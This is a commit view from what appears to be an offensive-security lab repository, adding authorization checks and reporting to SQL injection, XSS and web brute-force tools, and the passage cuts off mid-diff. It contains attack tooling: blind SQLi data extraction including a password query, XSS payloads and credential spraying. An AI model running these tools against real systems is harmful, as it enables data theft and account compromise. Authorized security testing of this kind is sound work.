hao/websafe-kb
1
0
派生 0
代码 工单 合并请求 1 工作流 软件包 项目 发布 百科 活动

更新: 359 个文件 - 2026-03-16 23:30:01

浏览代码
这个提交包含在:
hao
2026-03-16 23:30:01 -07:00
父节点 527990f535
当前提交 2974cd9ad9
修改 359 个文件,包含 6332 行新增673 行删除
下载 Patch 文件 下载 Diff 文件 展开所有文件 折叠所有文件

16
00-environments/README.md 普通文件
查看文件

@@ -0,0 +1,16 @@
# 环境编排与靶站目录
> `LAB ONLY` | `AUTHORIZED TARGETS ONLY` | `非生产环境`
本目录承载授权攻防实验的本地靶站编排和复现资产,分为三层:
- `catalog/systems/`
- 每个主流开源 Web 系统的环境供应元数据、默认 artifact 模式和服务提示。
- `profiles/`
- 可执行环境 profile,按 `core/<system>/current.yaml` 存放当前默认复现入口。
- `templates/synthetic/`
- 当历史版本或扩展包无法稳定获取时使用的最小合成靶场模板。
- [catalog](/Users/x/websafe/00-environments/catalog/README.md)
- [profiles](/Users/x/websafe/00-environments/profiles/README.md)
- [synthetic templates](/Users/x/websafe/00-environments/templates/synthetic/README.md)

5
00-environments/catalog/README.md 普通文件
查看文件

@@ -0,0 +1,5 @@
# 环境 Catalog
> `LAB ONLY` | 自动生成与维护
`systems/*.yaml` 是每个系统的环境供应真值,用于决定优先走真实版本还是 synthetic 补位。

5
00-environments/profiles/README.md 普通文件
查看文件

@@ -0,0 +1,5 @@
# 环境 Profiles
> `LAB ONLY` | 自动生成与维护
`core/<system>/current.yaml` 提供每个系统当前默认的可运行 profile。后续可以按需要扩展到具体版本文件。

5
00-environments/templates/synthetic/README.md 普通文件
查看文件

@@ -0,0 +1,5 @@
# Synthetic Templates
> `LAB ONLY` | `AUTHORIZED TARGETS ONLY`
当无法稳定获取历史版本、插件包或模块工件时,允许使用最小合成靶场补位。所有 synthetic 结果都必须在案例页和 registry 中显式标注。

118
01-sql-injection/tools/blind-sqli.py
查看文件

@@ -33,6 +33,24 @@ import urllib.parse
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import Callable, Optional, List
import sys
from pathlib import Path
import contextlib
import io
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import ( # noqa: E402
add_common_args,
emit_report,
ensure_authorized,
make_report,
parse_cookie_string,
parse_headers,
write_evidence,
)
class Colors:
@@ -332,8 +350,10 @@ def main():
)
parser.add_argument("--true-indicator", help="布尔盲注真值指示器")
parser.add_argument("-t", "--threads", type=int, default=1, help="线程数")
add_common_args(parser)
args = parser.parse_args()
ensure_authorized(args, parser)
requests.packages.urllib3.disable_warnings()
@@ -344,12 +364,7 @@ def main():
k, v = pair.split("=", 1)
data[k] = v
cookies = {}
if args.cookie:
for pair in args.cookie.split(";"):
if "=" in pair:
k, v = pair.strip().split("=", 1)
cookies[k] = v
cookies = parse_cookie_string(args.cookie)
exploit = BlindSQLi(
url=args.url,
@@ -360,32 +375,81 @@ def main():
delay=args.delay,
threads=args.threads,
)
exploit.session.headers.update(parse_headers(args.header))
if args.proxy:
exploit.session.proxies.update({"http": args.proxy, "https": args.proxy})
if args.format != "text":
exploit._print = lambda *_args, **_kwargs: None # type: ignore[assignment]
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}Blind SQL Injection Exploit Tool{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
result = None
stdout_buffer = io.StringIO()
capture = contextlib.redirect_stdout(stdout_buffer) if args.format != "text" else contextlib.nullcontext()
if args.query:
result = exploit.extract_string(
args.query, args.technique, args.dbms, true_indicator=args.true_indicator
)
print(f"\n{Colors.GREEN}[+] 结果: {result}{Colors.END}")
with capture:
if args.query:
result = exploit.extract_string(
args.query, args.technique, args.dbms, true_indicator=args.true_indicator
)
elif args.extract:
result = exploit.auto_extract(args.extract, args.dbms, args.technique)
print(f"\n{Colors.GREEN}[+] {args.extract}: {result}{Colors.END}")
elif args.extract:
result = exploit.auto_extract(args.extract, args.dbms, args.technique)
else:
print(
f"{Colors.YELLOW}请使用 --query 或 --extract 指定要提取的数据{Colors.END}"
)
print(f"\n示例:")
print(f" --extract user 提取当前用户")
print(f" --extract database 提取当前数据库")
print(f" --extract version 提取数据库版本")
print(f' --query "SELECT password FROM users LIMIT 1"')
if args.format == "text":
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}Blind SQL Injection Exploit Tool{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
if args.query:
print(f"\n{Colors.GREEN}[+] 结果: {result}{Colors.END}")
elif args.extract:
print(f"\n{Colors.GREEN}[+] {args.extract}: {result}{Colors.END}")
else:
print(
f"{Colors.YELLOW}请使用 --query 或 --extract 指定要提取的数据{Colors.END}"
)
print(f"\n示例:")
print(f" --extract user 提取当前用户")
print(f" --extract database 提取当前数据库")
print(f" --extract version 提取数据库版本")
print(f' --query "SELECT password FROM users LIMIT 1"')
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n")
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n")
evidence_refs = []
ref = write_evidence(
args,
"blind-sqli-result.json",
{
"result": result,
"captured_stdout": stdout_buffer.getvalue()[-1000:],
"technique": args.technique,
"dbms": args.dbms,
},
)
if ref:
evidence_refs.append(ref)
status = "verified" if result else "needs-review"
severity = "high" if result else "medium"
report = make_report(
tool="blind-sqli",
mode=f"{args.technique}-blind-extraction",
target=args.url,
status=status,
severity=severity,
payload_or_probe={"query": args.query, "extract": args.extract, "result": result},
request_summary={"param": args.param, "dbms": args.dbms, "threads": args.threads},
evidence_refs=evidence_refs,
destructive_risk="medium",
args=args,
)
text_lines = [
"=" * 60,
"Blind SQL Injection Exploit Tool",
"=" * 60,
f"Target: {args.url}",
f"Technique: {args.technique}",
f"Result Present: {'yes' if result else 'no'}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__":

128
01-sql-injection/tools/sqli-exploit.go
查看文件

@@ -2,11 +2,13 @@
package main
import (
"encoding/json"
"flag"
"fmt"
"io"
"net/http"
"net/url"
"os"
"strings"
"sync"
"time"
@@ -19,6 +21,9 @@ type SQLiExploit struct {
Param string
Threads int
Timeout time.Duration
Headers map[string]string
Cookie string
Quiet bool
}
type InjectionResult struct {
@@ -51,6 +56,7 @@ func NewSQLiExploit(target, method, param string, threads int, timeout time.Dura
Param: param,
Threads: threads,
Timeout: timeout,
Headers: map[string]string{},
}
}
@@ -78,6 +84,12 @@ func (s *SQLiExploit) SendRequest(payload string) (string, int, error) {
}
req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36")
for k, v := range s.Headers {
req.Header.Set(k, v)
}
if s.Cookie != "" {
req.Header.Set("Cookie", s.Cookie)
}
resp, err := s.Client.Do(req)
if err != nil {
@@ -120,8 +132,10 @@ func (s *SQLiExploit) TestTimeBased(payloads []struct {
ResponseLen: respLen,
})
mu.Unlock()
fmt.Printf("%s[VULN]%s [Time-based] %s - Delay: %v - DBMS: %s\n",
colorRed+colorBold, colorEnd, payload, elapsed, dbms)
if !s.Quiet {
fmt.Printf("%s[VULN]%s [Time-based] %s - Delay: %v - DBMS: %s\n",
colorRed+colorBold, colorEnd, payload, elapsed, dbms)
}
}
}(p.Payload, p.DBMS, p.Delay)
}
@@ -159,8 +173,10 @@ func (s *SQLiExploit) TestErrorBased(payloads []struct {
DBMS: dbms,
ResponseLen: respLen,
})
fmt.Printf("%s[VULN]%s [Error-based] %s - DBMS: %s\n",
colorRed+colorBold, colorEnd, p.Payload, dbms)
if !s.Quiet {
fmt.Printf("%s[VULN]%s [Error-based] %s - DBMS: %s\n",
colorRed+colorBold, colorEnd, p.Payload, dbms)
}
break
}
}
@@ -173,7 +189,9 @@ func (s *SQLiExploit) ExtractData(query string, technique string, dbms string, m
var result strings.Builder
charset := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-@."
fmt.Printf("\n%s[*]%s Extracting: %s\n", colorCyan, colorEnd, query)
if !s.Quiet {
fmt.Printf("\n%s[*]%s Extracting: %s\n", colorCyan, colorEnd, query)
}
for pos := 1; pos <= maxLen; pos++ {
found := false
@@ -197,7 +215,9 @@ func (s *SQLiExploit) ExtractData(query string, technique string, dbms string, m
if elapsed >= 900*time.Millisecond {
result.WriteByte(byte(char))
found = true
fmt.Printf("\r%s[+]%s Extracted: %s", colorGreen, colorEnd, result.String())
if !s.Quiet {
fmt.Printf("\r%s[+]%s Extracted: %s", colorGreen, colorEnd, result.String())
}
break
}
}
@@ -212,6 +232,21 @@ func (s *SQLiExploit) ExtractData(query string, technique string, dbms string, m
return result.String()
}
func parseHeaders(raw string) map[string]string {
headers := map[string]string{}
if raw == "" {
return headers
}
for _, part := range strings.Split(raw, ",") {
pair := strings.SplitN(part, ":", 2)
if len(pair) != 2 {
continue
}
headers[strings.TrimSpace(pair[0])] = strings.TrimSpace(pair[1])
}
return headers
}
func main() {
target := flag.String("u", "", "Target URL")
method := flag.String("m", "GET", "HTTP Method (GET/POST)")
@@ -222,25 +257,27 @@ func main() {
extract := flag.String("extract", "", "Data to extract (user/database/version)")
query := flag.String("query", "", "Custom SQL query")
dbms := flag.String("dbms", "mysql", "Database type (mysql/mssql/postgresql)")
header := flag.String("header", "", "Extra headers in Name:Value,Name2:Value2 format")
cookie := flag.String("cookie", "", "Cookie header value")
format := flag.String("format", "text", "Output format: text or json")
output := flag.String("output", "", "Write output to file")
evidenceDir := flag.String("evidence-dir", "", "Optional evidence directory")
runID := flag.String("run-id", "", "Associated run ID")
caseID := flag.String("case-id", "", "Associated case ID")
ackAuthorized := flag.Bool("ack-authorized", false, "Confirm the target is owned or authorized")
flag.Parse()
if *target == "" {
if *target == "" || !*ackAuthorized {
fmt.Printf("%s[ERROR]%s Target URL is required. Use -u flag.\n", colorRed, colorEnd)
flag.Usage()
return
}
fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd)
fmt.Printf("%sSQL Injection Exploit Tool (Go)%s\n", colorBold, colorEnd)
fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd)
exploit := NewSQLiExploit(*target, *method, *param, *threads, *timeout)
fmt.Printf("%s[INFO]%s Target: %s\n", colorBlue, colorEnd, *target)
fmt.Printf("%s[INFO]%s Method: %s\n", colorBlue, colorEnd, *method)
fmt.Printf("%s[INFO]%s Parameter: %s\n", colorBlue, colorEnd, *param)
fmt.Printf("%s[INFO]%s Technique: %s\n", colorBlue, colorEnd, *technique)
exploit.Headers = parseHeaders(*header)
exploit.Cookie = *cookie
exploit.Quiet = *format != "text"
timePayloads := []struct {
Payload string
@@ -266,14 +303,12 @@ func main() {
}
var allResults []InjectionResult
fmt.Printf("\n%s[*]%s Testing Time-based Injection...\n", colorCyan, colorEnd)
timeResults := exploit.TestTimeBased(timePayloads)
allResults = append(allResults, timeResults...)
fmt.Printf("\n%s[*]%s Testing Error-based Injection...\n", colorCyan, colorEnd)
errorResults := exploit.TestErrorBased(errorPayloads)
allResults = append(allResults, errorResults...)
extractedResult := ""
if *extract != "" || *query != "" {
var extractQuery string
@@ -310,15 +345,54 @@ func main() {
}
if extractQuery != "" {
result := exploit.ExtractData(extractQuery, *technique, *dbms, 100)
fmt.Printf("\n%s[+]%s Result: %s\n", colorGreen, colorEnd, result)
extractedResult = exploit.ExtractData(extractQuery, *technique, *dbms, 100)
}
}
fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd)
fmt.Printf("%s[SUMMARY]%s Found %d vulnerabilities\n", colorGreen, colorEnd, len(allResults))
for _, r := range allResults {
fmt.Printf(" - [%s] %s - %s\n", r.VulnType, r.DBMS, r.Payload)
report := map[string]interface{}{
"tool": "sqli-exploit-go",
"mode": *technique + "-probe-and-extract",
"target": *target,
"status": "needs-review",
"severity": "info",
"timestamp": time.Now().UTC().Format(time.RFC3339),
"request_summary": map[string]interface{}{"method": *method, "param": *param, "threads": *threads, "dbms": *dbms},
"payload_or_probe": map[string]interface{}{"hits": allResults, "extract": *extract, "query": *query, "result": extractedResult},
"evidence_refs": []string{},
"minimal_validation": "只读探测、最小化注入、可审计回显、可回滚验证。",
"authorization_scope": "lab-local, lab-public, authorized-third-party",
"destructive_risk": "medium",
"run_id": *runID,
"case_id": *caseID,
}
fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd)
if len(allResults) > 0 || extractedResult != "" {
report["status"] = "verified"
report["severity"] = "high"
}
if *evidenceDir != "" {
_ = os.MkdirAll(*evidenceDir, 0o755)
evidencePath := *evidenceDir + "/sqli-exploit-go.json"
if raw, err := json.MarshalIndent(report, "", " "); err == nil {
_ = os.WriteFile(evidencePath, append(raw, '\n'), 0o644)
report["evidence_refs"] = append(report["evidence_refs"].([]string), evidencePath)
}
}
var content []byte
if *format == "json" {
content, _ = json.MarshalIndent(report, "", " ")
} else {
lines := []string{
strings.Repeat("=", 60),
"SQL Injection Exploit Tool (Go)",
strings.Repeat("=", 60),
"Target: " + *target,
"Technique: " + *technique,
fmt.Sprintf("Hits: %d", len(allResults)),
"Status: " + report["status"].(string),
}
content = []byte(strings.Join(lines, "\n"))
}
if *output != "" {
_ = os.WriteFile(*output, append(content, '\n'), 0o644)
}
fmt.Println(string(content))
}

75
01-sql-injection/tools/sqli-scanner.py
查看文件

@@ -30,6 +30,22 @@ import urllib.parse
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import List, Dict, Tuple, Optional
import sys
from pathlib import Path
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import ( # noqa: E402
add_common_args,
emit_report,
ensure_authorized,
make_report,
parse_cookie_string,
parse_headers,
write_evidence,
)
class Colors:
@@ -322,12 +338,19 @@ def main():
parser.add_argument("-p", "--params", help="指定参数 (逗号分隔)")
parser.add_argument("-t", "--threads", type=int, default=5, help="线程数")
parser.add_argument("--timeout", type=int, default=10, help="超时时间")
add_common_args(parser)
args = parser.parse_args()
ensure_authorized(args, parser)
requests.packages.urllib3.disable_warnings()
scanner = SQLiScanner(timeout=args.timeout, threads=args.threads)
scanner.session.headers.update(parse_headers(args.header))
if args.proxy:
scanner.session.proxies.update({"http": args.proxy, "https": args.proxy})
if args.format != "text":
scanner.print_result = lambda *_args, **_kwargs: None # type: ignore[assignment]
data = {}
if args.data:
@@ -336,32 +359,48 @@ def main():
k, v = pair.split("=", 1)
data[k] = v
cookies = {}
if args.cookie:
for pair in args.cookie.split(";"):
if "=" in pair:
k, v = pair.strip().split("=", 1)
cookies[k] = v
cookies = parse_cookie_string(args.cookie)
params = args.params.split(",") if args.params else None
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}SQL Injection Scanner{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
scanner.print_result("INFO", f"目标: {args.url}")
scanner.print_result("INFO", f"方法: {args.method}")
results = scanner.scan_url(args.url, args.method, data, cookies, params)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
if results:
scanner.print_result("SUCCESS", f"发现 {len(results)} 个SQL注入漏洞!")
for r in results:
print(f" - {r}")
else:
scanner.print_result("INFO", "未发现SQL注入漏洞")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
evidence_refs = []
ref = write_evidence(args, "sqli-results.json", results)
if ref:
evidence_refs.append(ref)
status = "verified" if results else "needs-review"
severity = "high" if results else "info"
report = make_report(
tool="sqli-scanner",
mode="non-destructive-sqli-scan",
target=args.url,
status=status,
severity=severity,
payload_or_probe={"hits": results, "params": params or sorted(data.keys())},
request_summary={
"method": args.method,
"params": params or [],
"threads": args.threads,
"header_names": sorted(parse_headers(args.header).keys()),
},
evidence_refs=evidence_refs,
destructive_risk="medium",
args=args,
)
text_lines = [
"=" * 60,
"SQL Injection Scanner",
"=" * 60,
f"Target: {args.url}",
f"Method: {args.method}",
f"Hits: {len(results)}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__":

95
02-xss/tools/xss-fuzzer.py
查看文件

@@ -26,6 +26,23 @@ import re
import urllib.parse
from typing import List, Dict, Tuple, Optional
import time
import sys
from pathlib import Path
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import ( # noqa: E402
add_common_args,
emit_report,
ensure_authorized,
make_report,
parse_cookie_string,
parse_headers,
write_evidence,
)
class Colors:
@@ -345,16 +362,19 @@ def main():
"--all-categories", action="store_true", help="测试所有Payload类别"
)
parser.add_argument("--timeout", type=int, default=10, help="超时时间")
add_common_args(parser)
args = parser.parse_args()
ensure_authorized(args, parser)
requests.packages.urllib3.disable_warnings()
fuzzer = XSSFuzzer(timeout=args.timeout)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}XSS Fuzzer{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
fuzzer.session.headers.update(parse_headers(args.header))
if args.proxy:
fuzzer.session.proxies.update({"http": args.proxy, "https": args.proxy})
if args.format != "text":
fuzzer.print_result = lambda *_args, **_kwargs: None # type: ignore[assignment]
data = {}
if args.data:
@@ -363,13 +383,9 @@ def main():
k, v = pair.split("=", 1)
data[k] = v
cookies = {}
if args.cookie:
for pair in args.cookie.split(";"):
if "=" in pair:
k, v = pair.strip().split("=", 1)
cookies[k] = v
cookies = parse_cookie_string(args.cookie)
csp_result = {"has_csp": False, "weaknesses": []}
if args.check_csp:
fuzzer.print_result("INFO", "检查 CSP 策略...")
csp_result = fuzzer.check_csp(args.url, cookies)
@@ -384,6 +400,7 @@ def main():
for w in csp_result["weaknesses"]:
fuzzer.print_result("WARNING", f" - {w}")
dom_results = []
if args.dom_scan:
fuzzer.print_result("INFO", "扫描 DOM XSS...")
dom_results = fuzzer.scan_dom_xss(args.url, cookies)
@@ -396,18 +413,58 @@ def main():
fuzzer.print_result("INFO", "上下文分析:")
for ctx, status in context.items():
color = Colors.YELLOW if status == "未过滤" else Colors.GREEN
print(f" {color}{ctx}: {status}{Colors.END}")
if args.format == "text":
print(f" {color}{ctx}: {status}{Colors.END}")
results = fuzzer.test_reflected(args.url, args.param, args.method, data, cookies)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
if results:
fuzzer.print_result("SUCCESS", f"发现 {len(results)} 个 XSS 漏洞!")
for r in results:
print(f" - [{r['category']}] {r['param']}: {r['payload'][:60]}...")
else:
fuzzer.print_result("INFO", "未发现反射型 XSS 漏洞")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
evidence_refs = []
for name, payload in [
("xss-context.json", context),
("xss-reflected.json", results),
("xss-dom.json", dom_results),
("xss-csp.json", csp_result),
]:
ref = write_evidence(args, name, payload)
if ref:
evidence_refs.append(ref)
status = "verified" if results else "suspected" if dom_results or csp_result.get("weaknesses") else "needs-review"
severity = "high" if results else "medium" if dom_results else "low" if csp_result.get("weaknesses") else "info"
report = make_report(
tool="xss-fuzzer",
mode="dom-and-reflected-xss",
target=args.url,
status=status,
severity=severity,
payload_or_probe={
"reflected_hits": results,
"dom_hits": dom_results,
"context": context,
"csp": csp_result,
},
request_summary={
"method": args.method,
"param": args.param,
"has_body_template": bool(args.data),
"header_names": sorted(parse_headers(args.header).keys()),
},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
)
text_lines = [
"=" * 60,
"XSS Fuzzer",
"=" * 60,
f"Target: {args.url}",
f"Method: {args.method}",
f"Param: {args.param}",
f"Reflected Hits: {len(results)}",
f"DOM Findings: {len(dom_results)}",
f"CSP Weaknesses: {len(csp_result.get('weaknesses', []))}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__":

129
02-xss/tools/xss-scanner.go
查看文件

@@ -7,11 +7,13 @@
package main
import (
"encoding/json"
"flag"
"fmt"
"io"
"net/http"
"net/url"
"os"
"regexp"
"strings"
"sync"
@@ -30,6 +32,9 @@ type XSSScanner struct {
Threads int
Timeout time.Duration
Payloads map[string][]string
Headers map[string]string
Cookie string
Quiet bool
}
var (
@@ -52,6 +57,7 @@ func NewXSSScanner(threads int, timeout time.Duration) *XSSScanner {
},
Threads: threads,
Timeout: timeout,
Headers: map[string]string{},
Payloads: map[string][]string{
"basic": {
"<script>alert(1)</script>",
@@ -110,6 +116,12 @@ func (s *XSSScanner) SendRequest(targetURL, method, param, payload string) (stri
}
req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36")
for k, v := range s.Headers {
req.Header.Set(k, v)
}
if s.Cookie != "" {
req.Header.Set("Cookie", s.Cookie)
}
resp, err := s.Client.Do(req)
if err != nil {
@@ -150,8 +162,10 @@ func (s *XSSScanner) ScanURL(targetURL, method, param string) []XSSResult {
Category: cat,
})
mu.Unlock()
fmt.Printf("%s[VULN]%s [%s] %s - %s\n",
colorRed+colorBold, colorEnd, cat, param, p[:min(50, len(p))])
if !s.Quiet {
fmt.Printf("%s[VULN]%s [%s] %s - %s\n",
colorRed+colorBold, colorEnd, cat, param, p[:min(50, len(p))])
}
}
}(category, payload)
}
@@ -234,6 +248,21 @@ func min(a, b int) int {
return b
}
func parseHeaders(raw string) map[string]string {
headers := map[string]string{}
if raw == "" {
return headers
}
for _, part := range strings.Split(raw, ",") {
pair := strings.SplitN(part, ":", 2)
if len(pair) != 2 {
continue
}
headers[strings.TrimSpace(pair[0])] = strings.TrimSpace(pair[1])
}
return headers
}
func main() {
target := flag.String("u", "", "Target URL")
method := flag.String("m", "GET", "HTTP Method (GET/POST)")
@@ -242,53 +271,105 @@ func main() {
timeout := flag.Duration("timeout", 10*time.Second, "Request timeout")
checkCSP := flag.Bool("check-csp", false, "Check CSP headers")
domScan := flag.Bool("dom-scan", false, "Scan for DOM XSS")
header := flag.String("header", "", "Extra headers in Name:Value,Name2:Value2 format")
cookie := flag.String("cookie", "", "Cookie header value")
format := flag.String("format", "text", "Output format: text or json")
output := flag.String("output", "", "Write output to file")
evidenceDir := flag.String("evidence-dir", "", "Optional evidence directory")
runID := flag.String("run-id", "", "Associated run ID")
caseID := flag.String("case-id", "", "Associated case ID")
ackAuthorized := flag.Bool("ack-authorized", false, "Confirm the target is owned or authorized")
flag.Parse()
if *target == "" {
if *target == "" || !*ackAuthorized {
fmt.Printf("%s[ERROR]%s Target URL is required. Use -u flag.\n", colorRed, colorEnd)
flag.Usage()
return
}
fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd)
fmt.Printf("%sXSS Scanner (Go)%s\n", colorBold, colorEnd)
fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd)
scanner := NewXSSScanner(*threads, *timeout)
scanner.Headers = parseHeaders(*header)
scanner.Cookie = *cookie
scanner.Quiet = *format != "text"
fmt.Printf("%s[INFO]%s Target: %s\n", colorBlue, colorEnd, *target)
fmt.Printf("%s[INFO]%s Method: %s\n", colorBlue, colorEnd, *method)
fmt.Printf("%s[INFO]%s Parameter: %s\n", colorBlue, colorEnd, *param)
cspResult := map[string]interface{}{"has_csp": false, "weaknesses": []string{}}
if *checkCSP {
fmt.Printf("\n%s[*]%s Checking CSP...\n", colorCyan, colorEnd)
cspResult := scanner.CheckCSP(*target)
if cspResult["has_csp"].(bool) {
cspResult = scanner.CheckCSP(*target)
if *format == "text" && cspResult["has_csp"].(bool) {
fmt.Printf("%s[+]%s CSP configured: %s\n", colorGreen, colorEnd, cspResult["csp"].(string)[:min(100, len(cspResult["csp"].(string)))])
for _, w := range cspResult["weaknesses"].([]string) {
fmt.Printf("%s[-]%s Weakness: %s\n", colorYellow, colorEnd, w)
}
} else {
} else if *format == "text" {
fmt.Printf("%s[-]%s No CSP configured!\n", colorYellow, colorEnd)
}
}
domResults := []map[string]string{}
if *domScan {
fmt.Printf("\n%s[*]%s Scanning for DOM XSS...\n", colorCyan, colorEnd)
domResults := scanner.ScanDOMXSS(*target)
domResults = scanner.ScanDOMXSS(*target)
if *format == "text" {
fmt.Printf("\n%s[*]%s Scanning for DOM XSS...\n", colorCyan, colorEnd)
}
for _, r := range domResults {
if *format != "text" {
continue
}
fmt.Printf("%s[-]%s Potential DOM XSS: %s\n", colorYellow, colorEnd, r["desc"])
}
}
fmt.Printf("\n%s[*]%s Testing XSS payloads...\n", colorCyan, colorEnd)
results := scanner.ScanURL(*target, *method, *param)
fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd)
fmt.Printf("%s[SUMMARY]%s Found %d XSS vulnerabilities\n", colorGreen, colorEnd, len(results))
for _, r := range results {
fmt.Printf(" - [%s] %s: %s\n", r.Category, r.Type, r.Payload[:min(50, len(r.Payload))])
report := map[string]interface{}{
"tool": "xss-scanner-go",
"mode": "bulk-reflected-xss",
"target": *target,
"status": "needs-review",
"severity": "info",
"timestamp": time.Now().UTC().Format(time.RFC3339),
"request_summary": map[string]interface{}{"method": *method, "param": *param, "threads": *threads},
"payload_or_probe": map[string]interface{}{"reflected_hits": results, "dom_hits": domResults, "csp": cspResult},
"evidence_refs": []string{},
"minimal_validation": "只读探测、最小化注入、可审计回显、可回滚验证。",
"authorization_scope": "lab-local, lab-public, authorized-third-party",
"destructive_risk": "low",
"run_id": *runID,
"case_id": *caseID,
}
fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd)
if len(results) > 0 {
report["status"] = "verified"
report["severity"] = "high"
} else if len(domResults) > 0 {
report["status"] = "suspected"
report["severity"] = "medium"
}
if *evidenceDir != "" {
_ = os.MkdirAll(*evidenceDir, 0o755)
evidencePath := *evidenceDir + "/xss-scanner-go.json"
if raw, err := json.MarshalIndent(report, "", " "); err == nil {
_ = os.WriteFile(evidencePath, append(raw, '\n'), 0o644)
report["evidence_refs"] = append(report["evidence_refs"].([]string), evidencePath)
}
}
var content []byte
if *format == "json" {
content, _ = json.MarshalIndent(report, "", " ")
} else {
text := []string{
strings.Repeat("=", 60),
"XSS Scanner (Go)",
strings.Repeat("=", 60),
"Target: " + *target,
"Method: " + *method,
fmt.Sprintf("Reflected Hits: %d", len(results)),
fmt.Sprintf("DOM Findings: %d", len(domResults)),
"Status: " + report["status"].(string),
}
content = []byte(strings.Join(text, "\n"))
}
if *output != "" {
_ = os.WriteFile(*output, append(content, '\n'), 0o644)
}
fmt.Println(string(content))
}

72
03-authentication/bruteforce/tools/web-brute.py
查看文件

@@ -28,6 +28,21 @@ from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import List, Dict, Tuple, Optional
import re
import sys
from pathlib import Path
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import ( # noqa: E402
add_common_args,
emit_report,
ensure_authorized,
make_report,
parse_headers,
write_evidence,
)
class Colors:
@@ -249,14 +264,21 @@ def main():
parser.add_argument("--timeout", type=int, default=10, help="超时时间")
parser.add_argument("--delay", type=float, default=0, help="请求延迟(秒)")
parser.add_argument("-v", "--verbose", action="store_true", help="详细输出")
add_common_args(parser)
args = parser.parse_args()
ensure_authorized(args, parser)
requests.packages.urllib3.disable_warnings()
bruteforcer = WebBruteForcer(
threads=args.threads, timeout=args.timeout, delay=args.delay
)
bruteforcer.session.headers.update(parse_headers(args.header))
if args.proxy:
bruteforcer.session.proxies.update({"http": args.proxy, "https": args.proxy})
if args.format != "text":
bruteforcer.print_result = lambda *_args, **_kwargs: None # type: ignore[assignment]
usernames = []
if args.userlist:
@@ -276,10 +298,6 @@ def main():
bruteforcer.print_result("ERROR", "请提供密码 (--pass 或 -P)")
sys.exit(1)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}Web Brute Force Tool{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
bruteforcer.print_result("INFO", f"目标: {args.url}")
bruteforcer.print_result("INFO", f"用户数: {len(usernames)}")
bruteforcer.print_result("INFO", f"密码数: {len(passwords)}")
@@ -295,23 +313,45 @@ def main():
data_template=args.data,
success_pattern=args.success,
fail_pattern=args.fail,
verbose=args.verbose,
verbose=args.verbose and args.format == "text",
)
elapsed = time.time() - bruteforcer.start_time
rate = bruteforcer.attempts / elapsed if elapsed > 0 else 0
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
bruteforcer.print_result("INFO", f"总尝试: {bruteforcer.attempts}")
bruteforcer.print_result("INFO", f"耗时: {elapsed:.2f}s ({rate:.1f} req/s)")
if results:
bruteforcer.print_result("SUCCESS", f"发现 {len(results)} 个有效凭证!")
for r in results:
print(f" - {r['username']}:{r['password']}")
else:
bruteforcer.print_result("INFO", "未发现有效凭证")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
evidence_refs = []
ref = write_evidence(
args,
"web-brute-results.json",
{"results": results, "attempts": bruteforcer.attempts, "elapsed": elapsed, "rate": rate},
)
if ref:
evidence_refs.append(ref)
status = "verified" if results else "needs-review"
severity = "high" if results else "medium"
report = make_report(
tool="web-brute",
mode="credential-spray-lab",
target=args.url,
status=status,
severity=severity,
payload_or_probe={"results": results, "username_count": len(usernames), "password_count": len(passwords)},
request_summary={"method": args.method, "threads": args.threads, "delay": args.delay, "rate": rate},
evidence_refs=evidence_refs,
destructive_risk="medium",
